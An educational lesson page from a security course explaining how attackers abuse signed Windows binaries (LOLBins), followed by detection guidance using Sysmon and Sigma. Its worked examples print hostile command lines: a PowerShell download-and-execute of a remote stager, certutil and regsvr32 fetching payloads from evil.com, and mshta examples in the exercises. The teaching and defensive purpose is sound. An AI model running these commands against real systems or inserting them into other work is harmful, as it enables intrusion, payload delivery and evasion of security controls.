EpochZero Learn
EpochZero LearnMulti-Domain Tech Learning Hub
Courses
LeaderboardAbout
Dashboard
EpochZero
EpochZero Learn
Multi-Domain Tech Learning Hub

Structured learning for Reverse Engineering, Cloud Security, Cryptography, and Web Development. Articles, videos, tests, and peer discussion.

Learn

  • Learning Path
  • All Articles
  • Video Lessons
  • Podcast
  • eBooks & PDFs
  • Question Banks
  • Cheatsheets
  • MCQ Banks

Tests & Forum

  • All Tests
  • REMA Tests
  • Cloud Tests
  • Forum
  • REMA Forum
  • Cloud Forum
  • Crypto Forum
  • Web Dev Forum

Campus

  • REMA Club
  • Full Stack Dev Club
  • Extension Activity
  • Events
  • CTF Competitions
  • Workshops
  • Industrial Visits

Platform

  • Dashboard
  • Leaderboard
  • About
  • Verify Certificate

© 2026 EpochZero Learn. Educational content for learning purposes.

Course Instructor: Ashish Revar

All videos

Sign in to track your watch progress.

Ep. 4.2reverse-engineering

Malware's Perfect Disguise: Inside Advanced Code Injection

1 June 20256 views

Why attackers use legitimate Windows binaries instead of dropping their own. The LOLBin catalogue, three abuse categories with examples, and detection guidance.

The shift away from custom binaries

Ten years ago, malware analysts spent most of their time on custom executables that the attacker had compiled and dropped on disk. Today, sophisticated operators avoid dropping anything. Instead, they use legitimate, signed Windows binaries already present on every machine — abusing them to download payloads, execute code, and bypass security controls. Security tools struggle to block these binaries because doing so would break legitimate administrative functions.

This is Living off the Land (LotL), and the abused binaries are LOLBins.

Why LotL works

A typical endpoint protection product maintains policies like "alert if powershell.exe invokes a network connection" — but powershell.exe is signed by Microsoft, used by sysadmins daily, and runs ordinary management tasks constantly. Alerts on every PowerShell invocation drown the SOC in noise. The defender's choice is to either accept the noise or write narrower rules — narrower rules attackers can side-step.

The asymmetry is the attacker's friend. They need one technique that survives every signature update. The defender needs to spot one signal in a million benign events.

The LOLBin catalogue

BinaryAbuse
powershell.exeExecute encoded commands, download payloads (Invoke-WebRequest), run scripts in memory without touching disk
wmic.exeExecute commands on remote machines, create processes, query system information; abused for lateral movement
mshta.exeExecute VBScript or JavaScript embedded in .hta files; bypasses application whitelisting
msiexec.exeDownload and execute malicious .msi packages from a URL
certutil.exeDownload files (-urlcache -split -f), decode Base64 payloads (-decode); originally a certificate management tool
rundll32.exeExecute arbitrary DLL exports; can also run JavaScript
regsvr32.exeRegister COM objects from remote .sct scriptlets, bypassing AppLocker
wscript.exe, cscript.exeExecute VBScript / JScript files; common for phishing-borne payloads
bitsadmin.exeBackground Intelligent Transfer Service; download files silently

Each binary is signed, present in C:\Windows\System32, and indispensable to the OS.

Three abuse categories with worked examples

Fileless execution: PowerShell

powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden ^
  -Command "IEX(New-Object Net.WebClient).DownloadString('http://c2/stager.ps1')"

This downloads and executes a script entirely in memory. No file touches disk. Breakdown:

  • -NoProfile — skip the profile script (faster, fewer logs).
  • -ExecutionPolicy Bypass — ignore signing requirements.
  • -WindowStyle Hidden — no visible console window.
  • IEX — Invoke-Expression, executes the downloaded string as PowerShell code.

Net.WebClient.DownloadString reads the URL into memory; IEX interprets the result. The malicious code never has a filename or a hash on the victim's filesystem. EDRs that focus on file-on-disk indicators see nothing.

File download: certutil

certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\Users\Public\svc.exe
certutil.exe -decode encoded.txt payload.exe

certutil was designed for certificate management. It can also download arbitrary files (-urlcache -split -f) and decode Base64 (-decode). Both are essential for legitimate certificate workflows; both also serve attackers perfectly.

A SOC seeing certutil.exe make an outbound HTTP connection to an unfamiliar host should treat it as malicious until proven otherwise. Legitimate certutil usage almost never involves arbitrary URLs.

AppLocker bypass: regsvr32

regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll

Executes a remote scriptlet (.sct) containing VBScript or JScript. The flags:

  • /s — silent mode (no dialog boxes).
  • /n — do not call DllRegisterServer.
  • /u — unregister mode (triggers the DllUnregisterServer path).
  • /i:URL — passes the URL to the scriptlet handler.
  • scrobj.dll — the Windows Script Component runtime.

This technique bypasses AppLocker's default policy because regsvr32.exe is a Microsoft-signed system binary that AppLocker permits by default.

Detection guidance

Pure signature-based detection cannot stop LotL. The defender's only effective tools are behavioural:

  • Command-line argument monitoring. Sysmon Event ID 1 captures the full command line of every process. Patterns like powershell -enc <base64>, certutil -decode, mshta http: are highly suspicious.
  • Parent-child process anomalies. winword.exe spawning powershell.exe is unusual. outlook.exe spawning mshta.exe is unusual. Map normal parent-child relationships and alert on deviations.
  • Network egress from unexpected processes. certutil.exe making outbound HTTP, or regsvr32.exe resolving DNS for an external host — neither is normal.
  • Encoded-command detection. PowerShell's -EncodedCommand flag with high-entropy Base64 payloads, especially long ones, is rarely benign.

Sysinternals Sysmon with a tuned config (Olaf Hartong's modular sysmon-config is the de facto standard) catches most of this with one log source.

What you should be comfortable with after this lesson

  • Naming the major LOLBins and one abuse for each
  • Reading a suspicious command line and identifying the abuse category
  • Explaining why LotL is harder for defenders than custom-binary malware
  • Configuring Sysmon to detect the most common abuse patterns

Section 03

References

LOLBAS Project

Comprehensive, community-maintained catalogue of every documented LOLBin with abuse patterns and detection guidance.

reference
Sysinternals Sysmon

Microsoft's detailed system monitoring driver. Indispensable for LotL detection.

tool
Olaf Hartong — sysmon-modular

Production-grade modular Sysmon configuration covering MITRE ATT&CK techniques.

tool
MITRE ATT&CK — Living-Off-the-Land

ATT&CK technique T1218 — System Binary Proxy Execution. Sub-techniques cover individual LOLBins.

mitre

Section 04

Exercises

EX.01easy

Spot the abuse category

For each of these command lines, name the LOLBin abuse category (fileless / download / AppLocker bypass): (1) mshta http://evil/x.hta, (2) bitsadmin /transfer /download, (3) powershell -EncodedCommand <b64>.

EX.02medium

Configure Sysmon and detect

Install Sysmon with sysmon-modular. Run a test PowerShell -EncodedCommand. Find the matching event in Event Viewer. Verify the encoded command was logged.

EX.03hard

Build a detection rule

Write a Sigma rule that detects certutil.exe making outbound HTTP connections. Test it against benign certutil usage to verify it doesn't false-positive.

Up Next

The Dual-Vector Cloud Investigation Model
CS EP. 8
The Dual-Vector Cloud Investigation Model
cloud-security
Enterprise Cloud Security: Frameworks & Control Layers
CS EP. 5
Enterprise Cloud Security: Frameworks & Control Layers
cloud-security
Research Design & Literature Review | Research Methodology | Ep. 2
RM EP. 2
Research Design & Literature Review | Research Methodology | Ep. 2
research-methodology
How Cloud Resource Pooling Exposes You to CPU Leaks0:30
CLOUD SHORT
How Cloud Resource Pooling Exposes You to CPU Leaks
cloud-security
Bypassing Malware VM Detection: The MAC Address Trick1:00
REMA SHORT
Bypassing Malware VM Detection: The MAC Address Trick
malware-analysis
Cloud Access Security Broker CASB Explained — Securing the Cloud Perimeter1:00
CLOUD SHORT
Cloud Access Security Broker CASB Explained — Securing the Cloud Perimeter
cloud-security
Cloud Workload Protection Platform (CWPP) - 60 Second Masterclass1:00
CLOUD SHORT
Cloud Workload Protection Platform (CWPP) - 60 Second Masterclass
cloud-security
Cloud Security Posture Management CSPM: Stop Cloud Misconfigurations1:00
CLOUD SHORT
Cloud Security Posture Management CSPM: Stop Cloud Misconfigurations
cloud-security
Why Traditional Antivirus Fails Against Polymorphic Malware0:40
REMA SHORT
Why Traditional Antivirus Fails Against Polymorphic Malware
malware-analysis
Cloud Security Monitoring & Vulnerability Management (CSMV) | 60-Second Masterclass1:00
CLOUD SHORT
Cloud Security Monitoring & Vulnerability Management (CSMV) | 60-Second Masterclass
cloud-security
Cloud Infrastructure Entitlement Management (CIEM) | 60-Second Masterclass1:00
CLOUD SHORT
Cloud Infrastructure Entitlement Management (CIEM) | 60-Second Masterclass
cloud-security
Architecting Cloud Security: From Immutable Logs to Automated Governance
CS EP. 7
Architecting Cloud Security: From Immutable Logs to Automated Governance
cloud-security